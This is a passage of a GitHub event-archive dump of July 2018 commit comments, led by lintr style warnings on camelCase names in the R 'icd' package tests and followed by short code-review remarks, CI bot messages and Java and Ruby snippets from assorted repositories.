\"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:306:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L306) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:307:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L307) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:308:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L308) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:309:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:315:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L315) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:316:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L316) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:317:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L317) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:318:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L318) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:328:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L328) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:329:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:330:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L330) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:331:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:332:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L332) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:333:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:339:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L339) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:341:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L341) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:344:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L344) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:346:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:349:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L349) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:351:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:361:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L361) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:362:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L362) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:366:20:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L366) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:371:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L371) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:374:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L374) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:379:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L379) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:385:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L385) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:386:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L386) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:387:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L387) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/testthat/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/testthat/test-util.R:142:9:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-util.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:504:8:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-valid.R#L504) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:509:8:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-valid.R#L509) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:514:8:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-valid.R#L514) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-20T08:19:47Z"}
{"id":"7993604558","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29775639,"position":1,"line":1,"path":"BlackJack/bank.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T08:20:06Z","updated_at":"2018-07-20T08:20:06Z","author_association":"NONE","body":"Денис ))\r\nТЗ: \"Проект делайте в отдельном репозитории\""}},"created_at":"2018-07-20T08:20:06Z"}
{"id":"7993608868","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29775651,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-20T08:21:02Z","updated_at":"2018-07-20T08:21:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T08:21:02Z"}
{"id":"7993616026","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29775666,"position":null,"line":null,"path":null,"commit_id":"88e64ceee9410ee589d808c5e9923e7ec33a48de","created_at":"2018-07-20T08:22:39Z","updated_at":"2018-07-20T08:22:39Z","author_association":"OWNER","body":"Spells are broken for most classes because a lot of them changed with BFA upddate for ex. Paladin now has 3 different Judgment spells ( one for each spec ) and each of them adds different debuff\r\n\r\nI'm in process of updating spell definitions and that's my priority at the moment\r\n\r\nI've changed how Ovale refresh so it should work except when any of options listed below are active\r\n- Show in combat only\r\n- If has target\r\n- Hide if friendly or dead target"}},"created_at":"2018-07-20T08:22:39Z"}
{"id":"7993624202","type":"CommitCommentEvent","actor":{"login":"michaelandrepearce"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29775703,"position":87,"line":948,"path":"artemis-core-client/src/main/java/org/apache/activemq/artemis/core/protocol/core/impl/ActiveMQSessionContext.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-20T08:24:29Z","updated_at":"2018-07-20T08:24:29Z","author_association":"CONTRIBUTOR","body":"This should only be blocking if sendblocking. Else its not honouring the send type"}},"created_at":"2018-07-20T08:24:29Z"}
{"id":"7993627546","type":"CommitCommentEvent","actor":{"login":"jtfmumm"},"repo":{"name":"WallarooLabs/wallaroo"},"payload":{"comment":{"id":29775712,"position":5,"line":12,"path":"book/python/writing-your-own-partitioned-stateful-application.md","commit_id":"47ab7d6ed4b9b2c651328548af766c036884b49a","created_at":"2018-07-20T08:25:13Z","updated_at":"2018-07-20T08:25:13Z","author_association":"CONTRIBUTOR","body":"I think you can remove the last two sentences now."}},"created_at":"2018-07-20T08:25:13Z"}
{"id":"7993629476","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29775719,"position":null,"line":null,"path":null,"commit_id":"8674b5577b79cb31abfe92cbde400b39710c8b02","created_at":"2018-07-20T08:25:39Z","updated_at":"2018-07-20T08:25:39Z","author_association":"CONTRIBUTOR","body":"@Mottie This is a way too bright now\r\n\r\n![capture](https://user-images.githubusercontent.com/31389848/42991837-bb59b4da-8bfe-11e8-8f40-8dd8cc0aa019.PNG)\r\n\r\nIt would be better two blocks up in https://github.com/StylishThemes/GitHub-Dark/blob/8674b5577b79cb31abfe92cbde400b39710c8b02/github-dark.css#L3084\r\n\r\n![capture](https://user-images.githubusercontent.com/31389848/42991874-d934943e-8bfe-11e8-8cbd-362c91b15546.PNG)\r\n\r\n"}},"created_at":"2018-07-20T08:25:39Z"}
{"id":"7993629849","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29775721,"position":null,"line":null,"path":null,"commit_id":"883aa6649082fefa0527be010899758914be001d","created_at":"2018-07-20T08:25:44Z","updated_at":"2018-07-20T08:25:44Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\n\r\n//import javaapplication7.pp.NewClass; //ok\r\n//import javaapplication7.pp.*; //ok\r\n//import javaapplication7.*; //no\r\n\r\n\r\npublic class JavaApplication7 {\r\n\r\n    public static void main(String[] args){\r\n         javaapplication7.pp.NewClass ss=new NewClass ();\r\n    }//\r\n}\r\n\r\n```"}},"created_at":"2018-07-20T08:25:44Z"}
{"id":"7993629940","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/hire"},"payload":{"comment":{"id":29775722,"position":null,"line":null,"path":null,"commit_id":"40972476c538c90f3a36481eb6661f7382ceefed","created_at":"2018-07-20T08:25:45Z","updated_at":"2018-07-20T08:25:45Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=1)"}},"created_at":"2018-07-20T08:25:45Z"}
{"id":"7993632994","type":"CommitCommentEvent","actor":{"login":"michaelandrepearce"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29775732,"position":19,"line":574,"path":"artemis-jms-client/src/main/java/org/apache/activemq/artemis/jms/client/ActiveMQMessageProducer.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-20T08:26:24Z","updated_at":"2018-07-20T08:26:24Z","author_association":"CONTRIBUTOR","body":"Could this be a volatile with an atomic field updater "}},"created_at":"2018-07-20T08:26:24Z"}
{"id":"7993633345","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/hire"},"payload":{"comment":{"id":29775733,"position":null,"line":null,"path":null,"commit_id":"1e09226aeb64726203cbe152d8b8523081bcf18c","created_at":"2018-07-20T08:26:29Z","updated_at":"2018-07-20T08:26:29Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=2)"}},"created_at":"2018-07-20T08:26:29Z"}
{"id":"7993633451","type":"CommitCommentEvent","actor":{"login":"stevenjk2012"},"repo":{"name":"uestcyc/LDPC_code"},"payload":{"comment":{"id":29775734,"position":null,"line":null,"path":null,"commit_id":"e01721efe9fa89a4e02490727d730906dd7f7f1b","created_at":"2018-07-20T08:26:31Z","updated_at":"2018-07-20T08:26:31Z","author_association":"NONE","body":"Mark"}},"created_at":"2018-07-20T08:26:31Z"}
{"id":"7993633766","type":"CommitCommentEvent","actor":{"login":"ibearhunter"},"repo":{"name":"ibearhunter/Hello-World"},"payload":{"comment":{"id":29775735,"position":null,"line":null,"path":null,"commit_id":"67ace64d4e48e32bec246a2fa222985195ceba30","created_at":"2018-07-20T08:26:35Z","updated_at":"2018-07-20T08:26:35Z","author_association":"OWNER","body":"auto run"}},"created_at":"2018-07-20T08:26:35Z"}
{"id":"7993636094","type":"CommitCommentEvent","actor":{"login":"sghwangzi"},"repo":{"name":"zhumanito/tp5_shop"},"payload":{"comment":{"id":29775741,"position":null,"line":null,"path":null,"commit_id":"ca08ce0425c88ae32bb762e63938aaaf10ae0bda","created_at":"2018-07-20T08:27:08Z","updated_at":"2018-07-20T08:27:08Z","author_association":"NONE","body":"数据库咋删了\r\n"}},"created_at":"2018-07-20T08:27:08Z"}
{"id":"7993640336","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29775749,"position":null,"line":null,"path":null,"commit_id":"883aa6649082fefa0527be010899758914be001d","created_at":"2018-07-20T08:28:03Z","updated_at":"2018-07-20T08:28:03Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\n\r\n\r\n\r\npublic class JavaApplication7 {\r\n\r\n    public static void main(String[] args){\r\n           String s1=\"aa\";\r\n           String s2=\"aa\";\r\n           String s3=new String(s1);\r\n           if(s1==s2){ //T\r\n               System.out.println(\"ok1\");\r\n           }\r\n           if(s1==s3){ //F\r\n               System.out.println(\"ok2\"); // no\r\n           }\r\n           if(s1.equals(s3)){ //T\r\n               System.out.println(\"ok3\");\r\n           }\r\n    }//\r\n}\r\n\r\n```"}},"created_at":"2018-07-20T08:28:03Z"}
{"id":"7993642680","type":"CommitCommentEvent","actor":{"login":"PeterEmbedded"},"repo":{"name":"PeterEmbedded/BH1750FVI"},"payload":{"comment":{"id":29775754,"position":null,"line":null,"path":null,"commit_id":"29a53700b3d8fe7b96bfe9f818224b07a9e862bd","created_at":"2018-07-20T08:28:33Z","updated_at":"2018-07-20T08:28:33Z","author_association":"OWNER","body":"@per1234 Thank you contributing and providing detailed information. Very helpful."}},"created_at":"2018-07-20T08:28:33Z"}
{"id":"7993650790","type":"CommitCommentEvent","actor":{"login":"200cc"},"repo":{"name":"mtdhb/api"},"payload":{"comment":{"id":29775771,"position":19,"line":19,"path":"src/main/java/com/mtdhb/api/util/Synchronizes.java","commit_id":"5e869aa94e05e97427fcea4cec2a679b8d38639b","created_at":"2018-07-20T08:30:22Z","updated_at":"2018-07-20T08:30:22Z","author_association":"NONE","body":"不推荐用String.intern()做锁，String对象太重了。\r\n参考 https://stackoverflow.com/questions/133988/synchronizing-on-string-objects-in-java"}},"created_at":"2018-07-20T08:30:22Z"}
{"id":"7993661364","type":"CommitCommentEvent","actor":{"login":"anshulvora"},"repo":{"name":"anshulvora/hello-world"},"payload":{"comment":{"id":29775787,"position":4,"line":4,"path":"README.md","commit_id":"49abb567671aaa2a062eae127180dc4d04c698df","created_at":"2018-07-20T08:32:37Z","updated_at":"2018-07-20T08:32:37Z","author_association":"OWNER","body":"*engineer"}},"created_at":"2018-07-20T08:32:37Z"}
{"id":"7993664816","type":"CommitCommentEvent","actor":{"login":"webintoit"},"repo":{"name":"jitsi/docker-jitsi-meet"},"payload":{"comment":{"id":29775793,"position":null,"line":null,"path":null,"commit_id":"36d98c9e179da7958d2c4c7ffe039eb011e4091c","created_at":"2018-07-20T08:33:24Z","updated_at":"2018-07-20T08:33:24Z","author_association":"NONE","body":"http://www.reactiongifs.com/r/aws.gif\r\n"}},"created_at":"2018-07-20T08:33:24Z"}
{"id":"7993666120","type":"CommitCommentEvent","actor":{"login":"TI234"},"repo":{"name":"TI234/Git_Learning"},"payload":{"comment":{"id":29775799,"position":4,"line":12,"path":"test.py","commit_id":"a4fc8d4db66ee288a3acc2094aec05142076e181","created_at":"2018-07-20T08:33:43Z","updated_at":"2018-07-20T08:33:43Z","author_association":"OWNER","body":"huhuhuhu"}},"created_at":"2018-07-20T08:33:43Z"}
{"id":"7993668882","type":"CommitCommentEvent","actor":{"login":"AUTHAI-bit"},"repo":{"name":"trezor/connect"},"payload":{"comment":{"id":29775810,"position":13,"line":35,"path":"README.md","commit_id":"34fe6bc2fa95f5b50781a0f599c11f7e9f90ad38","created_at":"2018-07-20T08:34:20Z","updated_at":"2018-07-20T08:34:20Z","author_association":"NONE","body":"![trezor](https://user-images.githubusercontent.com/34436643/42990725-85bd9a9e-8bd1-11e8-8ee7-b2daf0d25989.png)\r\n![trezor_unpaired](https://user-images.githubusercontent.com/34436643/42990727-860fd99e-8bd1-11e8-9561-42f97bf1bff8.png)\r\n[9c958138-65bc-4bd2-9bf1-83ef64ae7cf4.pdf](https://github.com/trezor/connect/files/2213135/9c958138-65bc-4bd2-9bf1-83ef64ae7cf4.pdf)\r\n"}},"created_at":"2018-07-20T08:34:20Z"}
{"id":"7993670848","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-module-banner"},"payload":{"comment":{"id":29775814,"position":null,"line":null,"path":null,"commit_id":"ddee200944452a156206db43fd558e281d16271b","created_at":"2018-07-20T08:34:46Z","updated_at":"2018-07-20T08:34:46Z","author_association":"OWNER","body":"Rename controller to **banner_item_index**, layout, ui_component, route.."}},"created_at":"2018-07-20T08:34:46Z"}
{"id":"7993683160","type":"CommitCommentEvent","actor":{"login":"cminhtruong"},"repo":{"name":"cminhtruong/capstone-project"},"payload":{"comment":{"id":29775843,"position":null,"line":null,"path":null,"commit_id":"91f7dc59ff87e504d9610046c4a56e3e2526e484","created_at":"2018-07-20T08:37:29Z","updated_at":"2018-07-20T08:37:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Documentation and Prototype](https://trello.com/c/CG0yiXTM/20-documentation-and-prototype)"}},"created_at":"2018-07-20T08:37:29Z"}
{"id":"7993683309","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/hire"},"payload":{"comment":{"id":29775844,"position":null,"line":null,"path":null,"commit_id":"28a37a9a0b8bc99be4eea649c4e757294ba7260d","created_at":"2018-07-20T08:37:31Z","updated_at":"2018-07-20T08:37:31Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=3)"}},"created_at":"2018-07-20T08:37:31Z"}
{"id":"7993683367","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/hire"},"payload":{"comment":{"id":29775845,"position":null,"line":null,"path":null,"commit_id":"b2d847abbb8d33043b1ea7527ab8d7a96ec17d5f","created_at":"2018-07-20T08:37:32Z","updated_at":"2018-07-20T08:37:32Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=3)"}},"created_at":"2018-07-20T08:37:32Z"}
{"id":"7993686265","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29775853,"position":1,"line":1,"path":"5.python3 string decode and encode","commit_id":"3ffafdfe690b8f92c8a81bbab9954858fe643ac6","created_at":"2018-07-20T08:38:08Z","updated_at":"2018-07-20T08:38:08Z","author_association":"OWNER","body":"### python3中encode之后数据格式自动变为bytes格式"}},"created_at":"2018-07-20T08:38:08Z"}
{"id":"7993688302","type":"CommitCommentEvent","actor":{"login":"akoni1234"},"repo":{"name":"Hackplayers/hackthebox-writeups"},"payload":{"comment":{"id":29775860,"position":null,"line":null,"path":null,"commit_id":"c0e07efe4868f47124a7e50adf98551cd22ee673","created_at":"2018-07-20T08:38:34Z","updated_at":"2018-07-20T08:38:34Z","author_association":"NONE","body":"what is the password \r\n"}},"created_at":"2018-07-20T08:38:34Z"}
{"id":"7993691284","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29775865,"position":104,"line":104,"path":"BlackJack/game.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T08:39:14Z","updated_at":"2018-07-20T08:39:14Z","author_association":"NONE","body":"не имеет смысла писать код типа\r\n```ruby\r\nif a > c\r\n  true\r\nelse\r\n  false\r\nend\r\n```\r\nили\r\n\r\n```ruby\r\nb = a > c ? true : false\r\n```\r\n\r\nэти же строки можно заменить вот этим:\r\n```ruby\r\na > c\r\n```\r\nсравнение само по себе будет возвращать булево значение (`true` или `false`), т.к. операторы сравнения возвращают булево значение"}},"created_at":"2018-07-20T08:39:14Z"}
{"id":"7993692857","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/hire"},"payload":{"comment":{"id":29775867,"position":null,"line":null,"path":null,"commit_id":"2c771e34e11249de1416cbced79a5cf02ba29327","created_at":"2018-07-20T08:39:36Z","updated_at":"2018-07-20T08:39:36Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=5)"}},"created_at":"2018-07-20T08:39:36Z"}
